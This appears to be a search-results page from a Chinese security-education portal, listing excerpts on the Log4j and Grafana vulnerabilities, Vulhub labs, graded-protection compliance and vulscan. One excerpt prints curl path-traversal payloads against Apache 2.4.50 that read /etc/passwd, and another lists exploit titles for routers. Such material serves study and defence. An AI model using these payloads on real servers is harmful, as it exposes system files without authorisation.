搜索
共找到相关的 文章2176条 信息
  • Apache Log4j 反序列化远程代码执行(​靶机环境)

    Apache Log4j 远程代码执行 靶机环境:感谢vulfocus平台为我提供实操环境,谢谢!http://vulfocus.fofa.so/#/dashboard?image_id=3b8f15eb-7bd9-49b2-a69e-541f89c4216c靶机环境操作描述:描述: Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行。漏洞利用:POST /hello HTTP/1.1 Hos

    2021-12-10

  • Apache Log4j 远程代码执行漏洞

    2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。漏洞描述Apache Log4j2是一款优秀的Java日志框架。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。漏洞利用无需特殊配置,经阿里云安全团队验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。阿里云应急响应中心提醒 Apache Log4j2 用户尽快采取安全措施阻止漏洞攻击。漏洞评级Apache Log4j 远

    2021-12-09

  • 【漏洞预警】Grafana 任意文件读取漏洞(CVE-2021-43798)

    漏洞描述Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。2021年12月6日,国外安全研究人员披露Grafana中某些接口在提供静态文件时,攻击者通过构造恶意请求,可造成目录遍历,读取系统上的文件。阿里云应急响应中心提醒 Grafana 用户尽快采取安全措施阻止漏洞攻击。漏洞评级CVE-2021-43798 Grafana 任意文件读取漏洞 高危漏洞细节漏洞PoC漏洞EXP在野利用公开公开公开存在影响版本Grafana 8.x 系列安全建议截止北京时间2021年12月7日,官方尚未发布新版

    2021-12-07

  • Vulhub渗透测试靶场

    内网渗透靶场,渗透测试靶机,vulnhb渗透测试靶场下载下载Vulhub渗透靶场安装完成docker和docker-compose后,拉取Vulhub到本地任意目录即可:gitclonehttps://github.com/vulhub/vulhub.git启动漏洞环境docker-compose会自动查找当前目录下的配置文件(默认文件名为docker-compose.yml),并根据其内容编译镜像和启动容器。所以,要运行某个漏洞靶场,需要先进入该漏洞所在的目录。在Vulhub中选择某个环境,进入对应目录。如Flask服务端模板注入漏洞,我们进入flask/ssti目录:cdflask/ssti直接执行如下命令,进行漏洞靶场的编译和运行:#

    2021-12-03

  • 等级保护测评基本介绍,等保是做什么的?

    1.什么是等保测试?  等保为信息安全等级保护的简称,是指对国家秘密信息、法人、其他组织和公民的专有信息以及存储、传输和处理公共信息的信息系统的分级安全保护,以及对信息系统中信息安全事件的分级响应和处置。二、什么系统需要做等保测评?  1.国家事务处理信息系统(党政机关办公系统)  2.金融、税务、工商、海关、能源、交通、社会保障、教育等关系国计民生的信息系统。  3.国防工业、国家科研等单位的信息系统。  4.公共通信、广播电视传输等基础信息网络中的信息系统。  5.网管中心、重要网站等领域的重要信息系统;

    2021-12-03

  • 等保测评技术要求

    1、GB/T XXX-200X ICS 35.040L80信息安全技术 信息系统安全等级保护测评要求Information security technology- Testing and evaluation requirement for classified protection of information system 中华人民共和国国家质量监督检验检疫总局 中国国家标准化管理委员会 发布GB/T XXXX XXXX目次前言 . III 引言 . I V 1范围. (12规范性引用文件 (13术语和定义 (14总则 (14.1测评原则 (14.2测评内容 (14.3测评力度 (24.4结 2、果重用 (24.5使用方法 (25第一级信息系统单元测评 (35.1安全技术测评 (35.1.1物理安全 (35.1.2网络安全 (55

    2021-12-03

  • 等保测评二级三级多久测一次了?

    网络安全等级保护评估(等保测评)众所周知,三级信息系统每年评估一次,那么二级信息系统多久评估一次呢?  很多人对这个知识点模糊不清,包括一些现有的评价机构。很多测评机构在和客户沟通的时候会说三级系统一年测评一次,二级系统两年测评一次,所以客户对这个知识点的了解就更少了。其实很多销售都是模糊的。事实上,公安部的二级信息系统并没有明确需要评估等级保护。按照标准,公安部只规定二级信息系统已经运行(运营),二级以上信息系统由市级以上公安机关新建。具体要求:  第十四条信息系统建设完成后,运营使用单位或者其

    2021-12-03

  • vulscan - 使用 Nmap 进行漏洞扫描

    vulscan - 使用 Nmap 进行漏洞扫描介绍Vulscan 是一个将 nmap 增强为漏洞扫描器的扫描模块。nmap 选项 -sV 启用每个服务的版本检测,用于根据识别的产品确定潜在缺陷。在离线版本的 VulDB 中查找数据。安装请将文件安装到 Nmap 安装的以下文件夹中:Nmap\scripts\vulscan\*像这样克隆 GitHub 存储库:gitclonehttps://github.com/scipag/vulscanscipag_vulscan ln-s`pwd`/scipag_vulscan/usr/share/nmap/scripts/vulscan用法您必须运行以下最小命令来启动简单的漏洞扫描:nmap-sV--script=vulscan/vulscan.nsewww.example.com漏洞数据库目

    2021-12-02

  • Apache 2.4.50 路径遍历漏洞

    有效载荷:curlhttp://host:Port/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd curlhttp://host:Port/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd curlhttp://host:Port/cgi-bin/.%%32e/.%%32e/.%%32e/.%%32e/etc/passwd curlhttp://host:Port/cgi-bin/.%2%65/.%2%65/.%2%65/.%2%65/etc/passwd

    2021-11-27

  • 渗透测试有关的POC、EXP、脚本、提权、小工具等

    物联网设备手机天翼创维awifi路由器存在多处未授权访问漏洞华为WS331a产品管理页面存在CSRF漏洞CVE-2019-16313 蜂网互联企业级路由器v4.31密码泄露漏洞D-Link路由器RCE漏洞CVE-2019-13051-Pi-Hole路由端去广告软件的命令注入权限提升D-Link DIR-859 - RCE 未认证 (CVE-2019–17621)Huawei HG255 Directory Traversal[目录穿越]|本地备份文件D-Link 设备 - ssdpcgi 中未经身份验证的远程命令执行 (Metasploit)CVE-2019-20215(Metasploit)从 Interfaces.d 到 RCE:Mozilla WebThings IoT 网关漏洞挖掘小米系列路由器远程命令执行漏洞(CVE-2

    2021-11-27

ots网络logo

OTS网络安全门户主要提供网络信息安全教程、文章、工具,让更多的小伙伴加入我们的社区一起学习。

技术支持: 建站ABC | 管理登录